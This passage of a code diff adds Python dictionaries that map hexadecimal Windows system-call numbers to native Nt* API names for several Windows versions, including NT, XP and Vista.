+ '0x0065': 'NtOpenIoCompletion',
+ '0x0066': 'NtOpenJobObject',
+ '0x0067': 'NtOpenKey',
+ '0x0060': 'NtNotifyChangeMultipleKeys',
+ '0x0061': 'NtOpenDirectoryObject',
+ '0x0062': 'NtOpenEvent',
+ '0x0063': 'NtOpenEventPair',
+ '0x00dc': 'NtStopProfile',
+ '0x00b7': 'NtSaveMergedKeys',
+ '0x0098': 'NtQuerySystemTime',
+ '0x00c6': 'NtSetInformationProcess',
+ '0x00ad': 'NtReplyWaitReplyPort'},
+'NT':{
+ '0x009e': 'NtSetHighEventPair',
+ '0x0079': 'NtQuerySemaphore',
+ '0x0078': 'NtQuerySecurityObject',
+ '0x00c9': 'NtWriteFileGather',
+ '0x0073': 'NtQueryMutant',
+ '0x0072': 'NtQueryMultipleValueKey',
+ '0x0071': 'NtQueryKey',
+ '0x0070': 'NtQueryIntervalProfile',
+ '0x0077': 'NtQuerySection',
+ '0x0076': 'NtQueryPerformanceCounter',
+ '0x0075': 'NtQueryOleDirectoryFile',
+ '0x0074': 'NtQueryObject',
+ '0x008f': 'NtReplyPort',
+ '0x008d': 'NtRemoveIoCompletion',
+ '0x008e': 'NtReplaceKey',
+ '0x008b': 'NtReleaseMutant',
+ '0x008c': 'NtReleaseSemaphore',
+ '0x008a': 'NtRegisterThreadTerminatePort',
+ '0x00ba': 'NtSystemDebugControl',
+ '0x00bb': 'NtTerminateProcess',
+ '0x00bc': 'NtTerminateThread',
+ '0x00bd': 'NtTestAlert',
+ '0x00be': 'NtUnloadDriver',
+ '0x00bf': 'NtUnloadKey',
+ '0x00a9': 'NtSetLowEventPair',
+ '0x00a8': 'NtSetLdtEntries',
+ '0x000f': 'NtClose',
+ '0x00a4': 'NtSetInformationProcess',
+ '0x000d': 'NtCancelTimer',
+ '0x000e': 'NtClearEvent',
+ '0x000b': 'NtCallbackReturn',
+ '0x000c': 'NtCancelIoFile',
+ '0x00a3': 'NtSetInformationObject',
+ '0x000a': 'NtAllocateVirtualMemory',
+ '0x007c': 'NtQuerySystemInformation',
+ '0x007b': 'NtQuerySystemEnvironmentValue',
+ '0x007a': 'NtQuerySymbolicLinkObject',
+ '0x007f': 'NtQueryTimerResolution',
+ '0x007e': 'NtQueryTimer',
+ '0x007d': 'NtQuerySystemTime',
+ '0x00c3': 'NtVdmControl',
+ '0x0008': 'NtAllocateLocallyUniqueId',
+ '0x0009': 'NtAllocateUuids',
+ '0x0006': 'NtAlertResumeThread',
+ '0x0007': 'NtAlertThread',
+ '0x0004': 'NtAdjustGroupsToken',
+ '0x0005': 'NtAdjustPrivilegesToken',
+ '0x0002': 'NtAccessCheckAndAuditAlarm',
+ '0x0003': 'NtAddAtom',
+ '0x0000': 'NtAcceptConnectPort',
+ '0x0001': 'NtAccessCheck',
+ '0x0086': 'NtReadFile',
+ '0x0087': 'NtReadFileScatter',
+ '0x0084': 'NtRaiseException',
+ '0x0085': 'NtRaiseHardError',
+ '0x0082': 'NtQueryVolumeInformationFile',
+ '0x0083': 'NtQueueApcThread',
+ '0x0080': 'NtQueryValueKey',
+ '0x0081': 'NtQueryVirtualMemory',
+ '0x00b0': 'NtSetSystemTime',
+ '0x00b1': 'NtSetTimer',
+ '0x00b2': 'NtSetTimerResolution',
+ '0x00b3': 'NtSetValueKey',
+ '0x00b4': 'NtSetVolumeInformationFile',
+ '0x00b5': 'NtShutdownSystem',
+ '0x0088': 'NtReadRequestData',
+ '0x0089': 'NtReadVirtualMemory',
+ '0x00af': 'NtSetSystemPowerState',
+ '0x00aa': 'NtSetLowWaitHighEventPair',
+ '0x00ac': 'NtSetSecurityObject',
+ '0x00ab': 'NtSetLowWaitHighThread',
+ '0x00c7': 'NtWaitLowEventPair',
+ '0x00b8': 'NtStopProfile',
+ '0x00c5': 'NtWaitForSingleObject',
+ '0x00c4': 'NtWaitForMultipleObjects',
+ '0x0019': 'NtCreateKey',
+ '0x0018': 'NtCreateIoCompletion',
+ '0x00c1': 'NtUnlockVirtualMemory',
+ '0x00b9': 'NtSuspendThread',
+ '0x0015': 'NtCreateEvent',
+ '0x0014': 'NtCreateDirectoryObject',
+ '0x0017': 'NtCreateFile',
+ '0x0016': 'NtCreateEventPair',
+ '0x0011': 'NtCompleteConnectPort',
+ '0x0010': 'NtCloseObjectAuditAlarm',
+ '0x0013': 'NtContinue',
+ '0x0012': 'NtConnectPort',
+ '0x0095': 'NtRestoreKey',
+ '0x0094': 'NtResetEvent',
+ '0x0097': 'NtSaveKey',
+ '0x0096': 'NtResumeThread',
+ '0x0091': 'NtReplyWaitReplyPort',
+ '0x0090': 'NtReplyWaitReceivePort',
+ '0x0093': 'NtRequestWaitReplyPort',
+ '0x0092': 'NtRequestPort',
+ '0x002a': 'NtDeleteKey',
+ '0x002b': 'NtDeleteObjectAuditAlarm',
+ '0x002c': 'NtDeleteValueKey',
+ '0x002d': 'NtDeviceIoControlFile',
+ '0x002e': 'NtDisplayString',
+ '0x002f': 'NtDuplicateObject',
+ '0x00ae': 'NtSetSystemInformation',
+ '0x00c2': 'NtUnmapViewOfSection',
+ '0x0028': 'NtDeleteAtom',
+ '0x0029': 'NtDeleteFile',
+ '0x00d0': 'NtReplyWaitSendChannel',
+ '0x00d1': 'NtSendWaitReplyChannel',
+ '0x009a': 'NtSetDefaultHardErrorPort',
+ '0x009c': 'NtSetEaFile',
+ '0x009b': 'NtSetDefaultLocale',
+ '0x0020': 'NtCreateProfile',
+ '0x0021': 'NtCreateSection',
+ '0x0022': 'NtCreateSemaphore',
+ '0x0023': 'NtCreateSymbolicLinkObject',
+ '0x0024': 'NtCreateThread',
+ '0x0025': 'NtCreateTimer',
+ '0x0026': 'NtCreateToken',
+ '0x0027': 'NtDelayExecution',
+ '0x00cf': 'NtOpenChannel',
+ '0x00ce': 'NtListenChannel',
+ '0x00cd': 'NtCreateChannel',
+ '0x00cc': 'NtW32Call',
+ '0x00b6': 'NtSignalAndWaitForSingleObject',
+ '0x00ca': 'NtWriteRequestData',
+ '0x001e': 'NtCreatePort',
+ '0x001d': 'NtCreatePagingFile',
+ '0x001f': 'NtCreateProcess',
+ '0x001a': 'NtCreateMailslotFile',
+ '0x001c': 'NtCreateNamedPipeFile',
+ '0x001b': 'NtCreateMutant',
+ '0x004b': 'NtNotifyChangeKey',
+ '0x004c': 'NtOpenDirectoryObject',
+ '0x004a': 'NtNotifyChangeDirectoryFile',
+ '0x004f': 'NtOpenFile',
+ '0x004d': 'NtOpenEvent',
+ '0x004e': 'NtOpenEventPair',
+ '0x0037': 'NtFlushKey',
+ '0x0036': 'NtFlushInstructionCache',
+ '0x0035': 'NtFlushBuffersFile',
+ '0x0034': 'NtFindAtom',
+ '0x0033': 'NtExtendSection',
+ '0x0032': 'NtEnumerateValueKey',
+ '0x0031': 'NtEnumerateKey',
+ '0x0030': 'NtDuplicateToken',
+ '0x0039': 'NtFlushWriteBuffer',
+ '0x0038': 'NtFlushVirtualMemory',
+ 'NA': 'NtWriteErrorLogEntry',
+ '0x003f': 'NtImpersonateClientOfPort',
+ '0x003e': 'NtGetTickCount',
+ '0x003d': 'NtGetPlugPlayEvent',
+ '0x003c': 'NtGetContextThread',
+ '0x003b': 'NtFsControlFile',
+ '0x003a': 'NtFreeVirtualMemory',
+ '0x009d': 'NtSetEvent',
+ '0x0042': 'NtListenPort',
+ '0x0043': 'NtLoadDriver',
+ '0x0040': 'NtImpersonateThread',
+ '0x0041': 'NtInitializeRegistry',
+ '0x0046': 'NtLockFile',
+ '0x0047': 'NtLockVirtualMemory',
+ '0x0044': 'NtLoadKey',
+ '0x0045': 'NtLoadKey2',
+ '0x0048': 'NtMakeTemporaryObject',
+ '0x0049': 'NtMapViewOfSection',
+ '0x00a7': 'NtSetIntervalProfile',
+ '0x00a6': 'NtSetInformationToken',
+ '0x00a1': 'NtSetInformationFile',
+ '0x00d2': 'NtSetContextChannel',
+ '0x00a0': 'NtSetHighWaitLowThread',
+ '0x00a2': 'NtSetInformationKey',
+ '0x00a5': 'NtSetInformationThread',
+ '0x006d': 'NtQueryInformationProcess',
+ '0x006e': 'NtQueryInformationThread',
+ '0x006f': 'NtQueryInformationToken',
+ '0x00d3': 'NtYieldExecution',
+ '0x006a': 'NtQueryInformationFile',
+ '0x006b': 'NtQueryIoCompletion',
+ '0x006c': 'NtQueryInformationPort',
+ '0x0051': 'NtOpenKey',
+ '0x0050': 'NtOpenIoCompletion',
+ '0x0053': 'NtOpenObjectAuditAlarm',
+ '0x0052': 'NtOpenMutant',
+ '0x0055': 'NtOpenProcessToken',
+ '0x0054': 'NtOpenProcess',
+ '0x0057': 'NtOpenSemaphore',
+ '0x0056': 'NtOpenSection',
+ '0x0059': 'NtOpenThread',
+ '0x0058': 'NtOpenSymbolicLinkObject',
+ '0x00c8': 'NtWriteFile',
+ '0x00cb': 'NtWriteVirtualMemory',
+ '0x005a': 'NtOpenThreadToken',
+ '0x005c': 'NtPlugPlayControl',
+ '0x005b': 'NtOpenTimer',
+ '0x005e': 'NtPrivilegedServiceAuditAlarm',
+ '0x005d': 'NtPrivilegeCheck',
+ '0x005f': 'NtPrivilegeObjectAuditAlarm',
+ '0x0099': 'NtSetContextThread',
+ '0x0068': 'NtQueryEvent',
+ '0x0069': 'NtQueryFullAttributesFile',
+ '0x009f': 'NtSetHighWaitLowEventPair',
+ '0x0064': 'NtQueryDefaultLocale',
+ '0x0065': 'NtQueryDirectoryFile',
+ '0x0066': 'NtQueryDirectoryObject',
+ '0x0067': 'NtQueryEaFile',
+ '0x0060': 'NtProtectVirtualMemory',
+ '0x0061': 'NtPulseEvent',
+ '0x0062': 'NtQueryInformationAtom',
+ '0x0063': 'NtQueryAttributesFile',
+ '0x00b7': 'NtStartProfile',
+ '0x0098': 'NtSetIoCompletion',
+ '0x00c6': 'NtWaitHighEventPair',
+ '0x00c0': 'NtUnlockFile',
+ '0x00ad': 'NtSetSystemEnvironmentValue'},
+'XP': {
+ '0x0103': 'NtTestAlert',
+ '0x009e': 'NtQueryIntervalProfile',
+ '0x0079': 'NtOpenObjectAuditAlarm',
+ '0x0078': 'NtOpenMutant',
+ '0x00c9': 'NtRequestWakeupLatency',
+ '0x0073': 'NtOpenEventPair',
+ '0x0072': 'NtOpenEvent',
+ '0x0071': 'NtOpenDirectoryObject',
+ '0x0070': 'NtNotifyChangeMultipleKeys',
+ '0x0077': 'NtOpenKey',
+ '0x0076': 'NtOpenJobObject',
+ '0x0075': 'NtOpenIoCompletion',
+ '0x0074': 'NtOpenFile',
+ '0x008f': 'NtQueryDefaultLocale',
+ '0x00db': 'NtSetEvent',
+ '0x008d': 'NtQueryBootOptions',
+ '0x008e': 'NtQueryDebugFilterState',
+ '0x008b': 'NtQueryAttributesFile',
+ '0x008c': 'NtQueryBootEntryOrder',
+ '0x008a': 'NtPulseEvent',
+ '0x00ba': 'NtReadVirtualMemory',
+ '0x00bb': 'NtRegisterThreadTerminatePort',
+ '0x00bc': 'NtReleaseMutant',
+ '0x00bd': 'NtReleaseSemaphore',
+ '0x00be': 'NtRemoveIoCompletion',
+ '0x00bf': 'NtRemoveProcessDebug',
+ '0x00da': 'NtSetEaFile',
+ '0x00a9': 'NtQuerySemaphore',
+ '0x00a8': 'NtQuerySecurityObject',
+ '0x000f': 'NtAllocateUserPhysicalPages',
+ '0x00a4': 'NtQueryOpenSubKeys',
+ '0x000d': 'NtAlertThread',
+ '0x000e': 'NtAllocateLocallyUniqueId',
+ '0x000b': 'NtAdjustPrivilegesToken',
+ '0x000c': 'NtAlertResumeThread',
+ '0x00a3': 'NtQueryObject',
+ '0x000a': 'NtAdjustGroupsToken',
+ '0x00c0': 'NtRenameKey',
+ '0x00df': 'NtSetInformationDebugObject',
+ '0x00dd': 'NtSetHighEventPair',
+ '0x007c': 'NtOpenProcessTokenEx',
+ '0x007b': 'NtOpenProcessToken',
+ '0x007a': 'NtOpenProcess',
+ '0x00de': 'NtSetHighWaitLowEventPair',
+ '0x007f': 'NtOpenSymbolicLinkObject',
+ '0x007e': 'NtOpenSemaphore',
+ '0x007d': 'NtOpenSection',
+ '0x00c3': 'NtReplyWaitReceivePort',
+ '0x00f9': 'NtShutdownSystem',
+ '0x0008': 'NtAddAtom',
+ '0x0009': 'NtAddBootEntry',
+ '0x0006': 'NtAccessCheckByTypeResultListAndAuditAlarm',
+ '0x0007': 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle',
+ '0x0004': 'NtAccessCheckByTypeAndAuditAlarm',
+ '0x0005': 'NtAccessCheckByTypeResultList',
+ '0x0002': 'NtAccessCheckAndAuditAlarm',
+ '0x0003': 'NtAccessCheckByType',
+ '0x0000': 'NtAcceptConnectPort',
+ '0x0001': 'NtAccessCheck',
+ '0x0086': 'NtPrivilegeCheck',
+ '0x0087': 'NtPrivilegeObjectAuditAlarm',
+ '0x0084': 'NtPlugPlayControl',
+ '0x0085': 'NtPowerInformation',
+ '0x0082': 'NtOpenThreadTokenEx',
+ '0x0083': 'NtOpenTimer',
+ '0x0080': 'NtOpenThread',
+ '0x0081': 'NtOpenThreadToken',
+ '0x00b0': 'NtQueryTimerResolution',
+ '0x00b1': 'NtQueryValueKey',
+ '0x00b2': 'NtQueryVirtualMemory',
+ '0x00b3': 'NtQueryVolumeInformationFile',
+ '0x00b4': 'NtQueueApcThread',
+ '0x00b5': 'NtRaiseException',
+ '0x0088': 'NtPrivilegedServiceAuditAlarm',
+ '0x0089': 'NtProtectVirtualMemory',
+ '0x00af': 'NtQueryTimer',
+ '0x00aa': 'NtQuerySymbolicLinkObject',
+ '0x010d': 'NtWaitForDebugEvent',
+ '0x00f1': 'NtSetSystemPowerState',
+ '0x00ac': 'NtQuerySystemEnvironmentValueEx',
+ '0x00ab': 'NtQuerySystemEnvironmentValue',
+ '0x00c7': 'NtRequestPort',
+ '0x00b8': 'NtReadFileScatter',
+ '0x00c5': 'NtReplyWaitReplyPort',
+ '0x00c4': 'NtReplyWaitReceivePortEx',
+ '0x0019': 'NtClose',
+ '0x0018': 'NtClearEvent',
+ '0x00c1': 'NtReplaceKey',
+ '0x00b9': 'NtReadRequestData',
+ '0x0015': 'NtCancelDeviceWakeupRequest',
+ '0x0014': 'NtCallbackReturn',
+ '0x0017': 'NtCancelTimer',
+ '0x0016': 'NtCancelIoFile',
+ '0x0011': 'NtAllocateVirtualMemory',
+ '0x0010': 'NtAllocateUuids',
+ '0x0013': 'NtAssignProcessToJobObject',
+ '0x0012': 'NtAreMappedFilesTheSame',
+ '0x0095': 'NtQueryFullAttributesFile',
+ '0x0094': 'NtQueryEvent',
+ '0x0097': 'NtQueryInformationFile',
+ '0x0096': 'NtQueryInformationAtom',
+ '0x0091': 'NtQueryDirectoryFile',
+ '0x0090': 'NtQueryDefaultUILanguage',
+ '0x0093': 'NtQueryEaFile',
+ '0x0092': 'NtQueryDirectoryObject',
+ '0x002a': 'NtCreateMailslotFile',
+ '0x002b': 'NtCreateMutant',
+ '0x002c': 'NtCreateNamedPipeFile',
+ '0x002d': 'NtCreatePagingFile',
+ '0x002e': 'NtCreatePort',
+ '0x002f': 'NtCreateProcess',
+ '0x00ae': 'NtQuerySystemTime',
+ '0x00c2': 'NtReplyPort',
+ '0x0028': 'NtCreateJobSet',
+ '0x0029': 'NtCreateKey',
+ '0x00d0': 'NtSaveKeyEx',
+ '0x009f': 'NtQueryIoCompletion',
+ '0x009a': 'NtQueryInformationProcess',
+ '0x00d7': 'NtSetDefaultHardErrorPort',
+ '0x009c': 'NtQueryInformationToken',
+ '0x009b': 'NtQueryInformationThread',
+ '0x0020': 'NtContinue',
+ '0x0021': 'NtCreateDebugObject',
+ '0x0022': 'NtCreateDirectoryObject',
+ '0x0023': 'NtCreateEvent',
+ '0x0024': 'NtCreateEventPair',
+ '0x0025': 'NtCreateFile',
+ '0x0026': 'NtCreateIoCompletion',
+ '0x0027': 'NtCreateJobObject',
+ '0x00cf': 'NtSaveKey',
+ '0x00ce': 'NtResumeThread',
+ '0x00cd': 'NtResumeProcess',
+ '0x00cc': 'NtRestoreKey',
+ '0x00b6': 'NtRaiseHardError',
+ '0x00ca': 'NtResetEvent',
+ '0x00e8': 'NtSetIoCompletion',
+ '0x001e': 'NtCompressKey',
+ '0x001d': 'NtCompleteConnectPort',
+ '0x001f': 'NtConnectPort',
+ '0x001a': 'NtCloseObjectAuditAlarm',
+ '0x001c': 'NtCompareTokens',
+ '0x001b': 'NtCompactKeys',
+ '0x004b': 'NtFilterToken',
+ '0x004c': 'NtFindAtom',
+ '0x004a': 'NtExtendSection',
+ '0x004f': 'NtFlushKey',
+ '0x004d': 'NtFlushBuffersFile',
+ '0x004e': 'NtFlushInstructionCache',
+ '0x0037': 'NtCreateToken',
+ '0x0036': 'NtCreateTimer',
+ '0x0035': 'NtCreateThread',
+ '0x0034': 'NtCreateSymbolicLinkObject',
+ '0x0033': 'NtCreateSemaphore',
+ '0x0032': 'NtCreateSection',
+ '0x0031': 'NtCreateProfile',
+ '0x0030': 'NtCreateProcessEx',
+ '0x0039': 'NtDebugActiveProcess',
+ '0x0038': 'NtCreateWaitablePort',
+ '0x00e1': 'NtSetInformationJobObject',
+ '0x00e0': 'NtSetInformationFile',
+ '0x00e3': 'NtSetInformationObject',
+ '0x00e2': 'NtSetInformationKey',
+ '0x00e5': 'NtSetInformationThread',
+ '0x00e4': 'NtSetInformationProcess',
+ '0x00e7': 'NtSetIntervalProfile',
+ '0x00e6': 'NtSetInformationToken',
+ '0x00e9': 'NtSetLdtEntries',
+ 'NA': 'NtWriteErrorLogEntry',
+ '0x0109': 'NtUnlockFile',
+ '0x00fd': 'NtSuspendProcess',
+ '0x00fe': 'NtSuspendThread',
+ '0x00ff': 'NtSystemDebugControl',
+ '0x0108': 'NtUnloadKeyEx',
+ '0x0102': 'NtTerminateThread',
+ '0x00fa': 'NtSignalAndWaitForSingleObject',
+ '0x00fb': 'NtStartProfile',
+ '0x00fc': 'NtStopProfile',
+ '0x003f': 'NtDeleteKey',
+ '0x003e': 'NtDeleteFile',
+ '0x003d': 'NtDeleteBootEntry',
+ '0x003c': 'NtDeleteAtom',
+ '0x003b': 'NtDelayExecution',
+ '0x003a': 'NtDebugContinue',
+ '0x009d': 'NtQueryInstallUILanguage',
+ '0x00d1': 'NtSaveMergedKeys',
+ '0x0042': 'NtDeviceIoControlFile',
+ '0x0043': 'NtDisplayString',
+ '0x0040': 'NtDeleteObjectAuditAlarm',
+ '0x0041': 'NtDeleteValueKey',
+ '0x0046': 'NtEnumerateBootEntries',
+ '0x0047': 'NtEnumerateKey',
+ '0x0044': 'NtDuplicateObject',
+ '0x0045': 'NtDuplicateToken',
+ '0x00d6': 'NtSetDebugFilterState',
+ '0x0048': 'NtEnumerateSystemEnvironmentValuesEx',
+ '0x0049': 'NtEnumerateValueKey',
+ '0x00a7': 'NtQuerySection',
+ '0x00a6': 'NtQueryQuotaInformationFile',
+ '0x00f8': 'NtSetVolumeInformationFile',
+ '0x00d4': 'NtSetBootOptions',
+ '0x00f4': 'NtSetTimer',
+ '0x00a1': 'NtQueryMultipleValueKey',
+ '0x00f6': 'NtSetUuidSeed',
+ '0x00d5': 'NtSetContextThread',
+ '0x00f0': 'NtSetSystemInformation',
+ '0x00d2': 'NtSecureConnectPort',
+ '0x00f2': 'NtSetSystemTime',
+ '0x00a0': 'NtQueryKey',
+ '0x00ea': 'NtSetLowEventPair',
+ '0x00ec': 'NtSetQuotaInformationFile',
+ '0x00eb': 'NtSetLowWaitHighEventPair',
+ '0x00ee': 'NtSetSystemEnvironmentValue',
+ '0x00ed': 'NtSetSecurityObject',
+ '0x00f7': 'NtSetValueKey',
+ '0x00ef': 'NtSetSystemEnvironmentValueEx',
+ '0x00a2': 'NtQueryMutant',
+ '0x00d8': 'NtSetDefaultLocale',
+ '0x010f': 'NtWaitForSingleObject',
+ '0x010e': 'NtWaitForMultipleObjects',
+ '0x00d9': 'NtSetDefaultUILanguage',
+ '0x010c': 'NtVdmControl',
+ '0x010b': 'NtUnmapViewOfSection',
+ '0x010a': 'NtUnlockVirtualMemory',
+ '0x00a5': 'NtQueryPerformanceCounter',
+ '0x006d': 'NtModifyBootEntry',
+ '0x006e': 'NtNotifyChangeDirectoryFile',
+ '0x006f': 'NtNotifyChangeKey',
+ '0x00d3': 'NtSetBootEntryOrder',
+ '0x006a': 'NtMapUserPhysicalPages',
+ '0x006b': 'NtMapUserPhysicalPagesScatter',
+ '0x006c': 'NtMapViewOfSection',
+ '0x0051': 'NtFlushWriteBuffer',
+ '0x0050': 'NtFlushVirtualMemory',
+ '0x0053': 'NtFreeVirtualMemory',
+ '0x0052': 'NtFreeUserPhysicalPages',
+ '0x0055': 'NtGetContextThread',
+ '0x0054': 'NtFsControlFile',
+ '0x0057': 'NtGetPlugPlayEvent',
+ '0x0056': 'NtGetDevicePowerState',
+ '0x0059': 'NtImpersonateAnonymousToken',
+ '0x0058': 'NtGetWriteWatch',
+ '0x00c8': 'NtRequestWaitReplyPort',
+ '0x00f5': 'NtSetTimerResolution',
+ '0x0118': 'NtOpenKeyedEvent',
+ '0x0119': 'NtReleaseKeyedEvent',
+ '0x0110': 'NtWaitHighEventPair',
+ '0x0111': 'NtWaitLowEventPair',
+ '0x00f3': 'NtSetThreadExecutionState',
+ '0x0113': 'NtWriteFileGather',
+ '0x0114': 'NtWriteRequestData',
+ '0x0115': 'NtWriteVirtualMemory',
+ '0x0116': 'NtYieldExecution',
+ '0x0117': 'NtCreateKeyedEvent',
+ '0x00cb': 'NtResetWriteWatch',
+ '0x005a': 'NtImpersonateClientOfPort',
+ '0x005c': 'NtInitializeRegistry',
+ '0x005b': 'NtImpersonateThread',
+ '0x005e': 'NtIsProcessInJob',
+ '0x005d': 'NtInitiatePowerAction',
+ '0x005f': 'NtIsSystemResumeAutomatic',
+ '0x011a': 'NtWaitForKeyedEvent',
+ '0x0107': 'NtUnloadKey',
+ '0x0106': 'NtUnloadDriver',
+ '0x0105': 'NtTranslateFilePath',
+ '0x0099': 'NtQueryInformationPort',
+ '0x0068': 'NtMakePermanentObject',
+ '0x0069': 'NtMakeTemporaryObject',
+ '0x0101': 'NtTerminateProcess',
+ '0x0100': 'NtTerminateJobObject',
+ '0x0064': 'NtLockFile',
+ '0x0065': 'NtLockProductActivationKeys',
+ '0x0066': 'NtLockRegistryKey',
+ '0x0067': 'NtLockVirtualMemory',
+ '0x0060': 'NtListenPort',
+ '0x0061': 'NtLoadDriver',
+ '0x0062': 'NtLoadKey',
+ '0x0063': 'NtLoadKey2',
+ '0x00dc': 'NtSetEventBoostPriority',
+ '0x00b7': 'NtReadFile',
+ '0x0104': 'NtTraceEvent',
+ '0x0098': 'NtQueryInformationJobObject',
+ '0x00c6': 'NtRequestDeviceWakeup',
+ '0x011b': 'NtQueryPortInformationProcess',
+ '0x0112': 'NtWriteFile',
+ '0x00ad': 'NtQuerySystemInformation'},
+ 'Vista': {'0x0172': 'NtCancelIoFileEx',
+ '0x0173': 'NtCancelSynchronousIoFile',
+ '0x0079': 'NtDeleteFile',
+ '0x0078': 'NtDeleteDriverEntry',
+ '0x0176': 'NtPullTransaction',
+ '0x0177': 'NtMarshallTransaction',
+ '0x0174': 'NtRemoveIoCompletionEx',
+ '0x0175': 'NtRegisterProtocolAddressInformation',
+ '0x0073': 'NtDebugActiveProcess',
+ '0x0072': 'NtCreateWaitablePort',
+ '0x0178': 'NtPropagationComplete',
+ '0x0012': 'NtAllocateVirtualMemory',
+ '0x0077': 'NtDeleteBootEntry',
+ '0x0076': 'NtDeleteAtom',
+ '0x0075': 'NtDelayExecution',
+ '0x0074': 'NtDebugContinue',
+ '0x00ba': 'NtOpenJobObject',
+ '0x00bb': 'NtOpenKey',
+ '0x00bc': 'NtOpenMutant',
+ '0x00bd': 'NtOpenPrivateNamespace',
+ '0x00be': 'NtOpenObjectAuditAlarm',
+ '0x00bf': 'NtOpenProcess',
+ '0x000f': 'NtAllocateLocallyUniqueId',
+ '0x000d': 'NtAlertResumeThread',
+ '0x000e': 'NtAlertThread',
+ '0x000b': 'NtAdjustGroupsToken',
+ '0x000c': 'NtAdjustPrivilegesToken',
+ '0x000a': 'NtAddDriverEntry',
+ '0x017b': 'NtReleaseWorkerFactoryWorker',
+ '0x017c': 'NtWaitForWorkViaWorkerFactory',
+ '0x017a': 'NtCreateWorkerFactory',
+ '0x017f': 'NtWorkerFactoryWorkerReady',
+ '0x017d': 'NtSetInformationWorkerFactory',
+ '0x017e': 'NtQueryInformationWorkerFactory',
+ '0x007c': 'NtDeleteObjectAuditAlarm',
+ '0x007b': 'NtDeletePrivateNamespace',
+ '0x007a': 'NtDeleteKey',
+ '0x007f': 'NtDisplayString',
+ '0x007e': 'NtDeviceIoControlFile',
+ '0x007d': 'NtDeleteValueKey',
+ '0x00f8': 'NtQueryTimerResolution',
+ '0x0128': 'NtSetEaFile',
+ '0x0008': 'NtAddAtom',
+ '0x0009': 'NtAddBootEntry',
+ '0x0006': 'NtAccessCheckByTypeResultListAndAuditAlarm',
+ '0x0007': 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle',
+ '0x0004': 'NtAccessCheckByTypeAndAuditAlarm',
+ '0x0005': 'NtAccessCheckByTypeResultList',
+ '0x0002': 'NtAccessCheckAndAuditAlarm',
+ '0x0003': 'NtAccessCheckByType',
+ '0x0000': 'NtAcceptConnectPort',
+ '0x0001': 'NtAccessCheck',
+ '0x00b8': 'NtOpenFile',
+ '0x00b9': 'NtOpenIoCompletion',
+ '0x0171': 'NtGetNextThread',
+ '0x00f5': 'NtQuerySystemInformation',
+ '0x00b0': 'NtModifyBootEntry',
+ '0x00b1': 'NtModifyDriverEntry',
+ '0x00b2': 'NtNotifyChangeDirectoryFile',
+ '0x00b3': 'NtNotifyChangeKey',
+ '0x00b4': 'NtNotifyChangeMultipleKeys',
+ '0x00b5': 'NtOpenDirectoryObject',
+ '0x00b6': 'NtOpenEvent',
+ '0x00b7': 'NtOpenEventPair',
+ '0x00f7': 'NtQueryTimer',
+ '0x00f0': 'NtQuerySecurityObject',
+ '0x00f1': 'NtQuerySemaphore',
+ '0x00f2': 'NtQuerySymbolicLinkObject',
+ '0x00f3': 'NtQuerySystemEnvironmentValue',
+ '0x0071': 'NtStartTm',
+ '0x0179': 'NtPropagationFailed',
+ '0x0095': 'NtGetContextThread',
+ '0x0094': 'NtFsControlFile',
+ '0x0097': 'NtGetNlsSectionPtr',
+ '0x0096': 'NtGetDevicePowerState',
+ '0x0091': 'NtFreeVirtualMemory',
+ '0x0090': 'NtFreeUserPhysicalPages',
+ '0x0093': 'NtFreezeTransactions',
+ '0x0092': 'NtFreezeRegistry',
+ '0x0099': 'NtGetWriteWatch',
+ '0x0098': 'NtGetPlugPlayEvent',
+ '0x009e': 'NtInitializeRegistry',
+ '0x009d': 'NtInitializeNlsFiles',
+ '0x009f': 'NtInitiatePowerAction',
+ '0x009a': 'NtImpersonateAnonymousToken',
+ '0x009c': 'NtImpersonateThread',
+ '0x009b': 'NtImpersonateClientOfPort',
+ '0x004b': 'NtCreateSymbolicLinkObject',
+ '0x004c': 'NtCreateThread',
+ '0x004a': 'NtCreateSemaphore',
+ '0x004f': 'NtCreateTransaction',
+ '0x004d': 'NtCreateTimer',
+ '0x004e': 'NtCreateToken',
+ '0x012e': 'NtSetInformationFile',
+ '0x00fe': 'NtRaiseHardError',
+ '0x00ff': 'NtReadFile',
+ '0x012f': 'NtSetInformationJobObject',
+ '0x012a': 'NtSetEventBoostPriority',
+ '0x00fa': 'NtQueryVirtualMemory',
+ '0x012c': 'NtSetHighWaitLowEventPair',
+ '0x012b': 'NtSetHighEventPair',
+ '0x0042': 'NtCreateNamedPipeFile',
+ '0x0043': 'NtCreatePrivateNamespace',
+ '0x0040': 'NtCreateMailslotFile',
+ '0x0041': 'NtCreateMutant',
+ '0x0046': 'NtCreateProcess',
+ '0x0047': 'NtCreateProcessEx',
+ '0x0044': 'NtCreatePagingFile',
+ '0x0045': 'NtCreatePort',
+ '0x0048': 'NtCreateProfile',
+ '0x0049': 'NtCreateSection',
+ '0x0170': 'NtGetNextProcess',
+ '0x0129': 'NtSetEvent',
+ '0x00f9': 'NtQueryValueKey',
+ '0x0125': 'NtSetDefaultLocale',
+ '0x0124': 'NtSetDefaultHardErrorPort',
+ '0x00f6': 'NtQuerySystemTime',
+ '0x0126': 'NtSetDefaultUILanguage',
+ '0x0121': 'NtSetBootOptions',
+ '0x0120': 'NtSetBootEntryOrder',
+ '0x0123': 'NtSetDebugFilterState',
+ '0x0122': 'NtSetContextThread',
+ '0x0070': 'NtQueryInformationEnlistment',
+ '0x016a': 'NtOpenKeyedEvent',
+ '0x016c': 'NtWaitForKeyedEvent',
+ '0x016b': 'NtReleaseKeyedEvent',
+ '0x016e': 'NtGetCurrentProcessorNumber',
+ '0x016d': 'NtQueryPortInformationProcess',
+ '0x016f': 'NtWaitForMultipleObjects32',
+ '0x0161': 'NtWaitForSingleObject',
+ '0x0160': 'NtWaitForMultipleObjects',
+ '0x0163': 'NtWaitLowEventPair',
+ '0x0162': 'NtWaitHighEventPair',
+ '0x0165': 'NtWriteFileGather',
+ '0x0164': 'NtWriteFile',
+ '0x0167': 'NtWriteVirtualMemory',
+ '0x0166': 'NtWriteRequestData',
+ '0x0169': 'NtCreateKeyedEvent',
+ '0x0168': 'NtYieldExecution',
+ '0x00c7': 'NtOpenThreadToken',
+ '0x00c6': 'NtOpenThread',
+ '0x00c5': 'NtOpenSymbolicLinkObject',
+ '0x00c4': 'NtOpenSession',
+ '0x0019': 'NtAlpcCreateSectionView',
+ '0x0018': 'NtAlpcCreateResourceReserve',
+ '0x00c1': 'NtOpenProcessTokenEx',
+ '0x00c0': 'NtOpenProcessToken',
